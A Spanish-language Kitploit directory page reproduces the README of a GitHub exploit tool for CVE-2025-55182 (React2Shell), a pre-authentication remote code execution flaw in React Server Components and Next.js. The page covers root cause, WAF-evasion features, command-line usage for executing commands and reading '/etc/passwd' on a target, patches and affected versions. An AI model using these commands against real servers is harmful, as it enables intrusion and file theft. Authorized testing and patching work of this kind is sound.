Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182 — Exploit de RCE de pre-autenticación para CVE-2025-55182 (React2Shell) dirigido a React Server Components. Incluye escaneo, verificación OAST, bypass de WAF, ejecución de comandos y lectura de archivos. | Kitploit
Herramientas/GitHubGitHub/sentinelxofficial/cve-2025-55182
ReconocimientoAnálisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
sentinelxofficial/cve-2025-55182

CVE-2025-55182

Exploit de RCE de pre-autenticación para CVE-2025-55182 (React2Shell) dirigido a React Server Components. Incluye escaneo, verificación OAST, bypass de WAF, ejecución de comandos y lectura de archivos.

Ver Repositorio
14hace 2 mesesAún no revisado
Compartir

CVE-2025-55182 — React2Shell

Ejecución remota de código sin autenticación previa en React Server Components (RSC), Next.js y frameworks relacionados.

CVE CVSS Type Author


Resumen

CVE-2025-55182 (también conocido como React2Shell) es una vulnerabilidad crítica de RCE sin autenticación previa que afecta al ecosistema de React Server Components (RSC). Un atacante no autenticado puede comprometer completamente un servidor vulnerable con una única solicitud HTTP POST manipulada.

Análisis Técnico

Causa Raíz

React Server Components utiliza un formato de serialización personalizado llamado React Flight para serializar referencias a funciones y llamadas a módulos. La vulnerabilidad reside en el mecanismo de decodificación de payloads que procesa las solicitudes POST entrantes a los endpoints RSC.

Cuando el servidor recibe un payload de React Flight, lo deserializa sin una validación adecuada, confiando en los campos $$typeof controlados por el atacante y en la resolución de referencias a módulos. Esto permite a un atacante:

  1. Hacer referencia a módulos integrados arbitrarios de Node.js (por ejemplo, child_process, fs, net)
  2. Encadenar llamadas a funciones a través del marcador de tipo $F (función)
  3. Ejecutar código arbitrario en el entorno de ejecución del servidor Node.js

Versiones Afectadas

CVSS

root@kitploit:~

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


Características

  • Escanear – Detecta endpoints RSC vulnerables y realiza fingerprinting de versiones de Next.js/React.
  • Verificar (OAST) – Envía payloads fuera de banda para confirmar RCE mediante devoluciones de llamada DNS/HTTP.
  • Evasión – Evasión completa de WAF/IDS: mutaciones de tipo de contenido, codificación de payloads, suplantación de encabezados, variantes de ruta y payloads para WAF.
  • Ejecutar – Ejecuta comandos arbitrarios del sistema en el objetivo (por ejemplo, id, whoami).
  • Leer – Lee archivos arbitrarios del servidor (por ejemplo, /etc/passwd, package.json).
  • Salida JSON – Resultados legibles por máquina para integración.

Instalación

root@kitploit:~
git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

Uso

Escaneo Básico

root@kitploit:~
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

Verificar RCE con OAST

root@kitploit:~
python3 poc.py -t https://target.com -m verify --oast your.oast.domain

Prueba Completa de Evasión

root@kitploit:~
python3 poc.py -t https://target.com -m bypass --verbose

Ejecutar Comandos

root@kitploit:~
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

Leer Archivos

root@kitploit:~
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

Usando un Proxy (p. ej., Burp Suite)

root@kitploit:~
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

Estructura de Archivos

root@kitploit:~
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

Mitigación

Parche (Recomendado)

root@kitploit:~
npm install [email protected]
npm install [email protected] [email protected]

Soluciones Temporales

· Deshabilitar Server Functions ("use server") · Reglas WAF para bloquear Content-Type: text/x-component · Segmentación de red para endpoints RSC


Referencias

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


Aviso legal: Solo para pruebas de seguridad autorizadas.

Autor: SentinelX · https://t.me/SentinelXsecurity

Descargar herramienta
PaqueteVulnerableCorregido
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (consulte el parche)versiones corregidas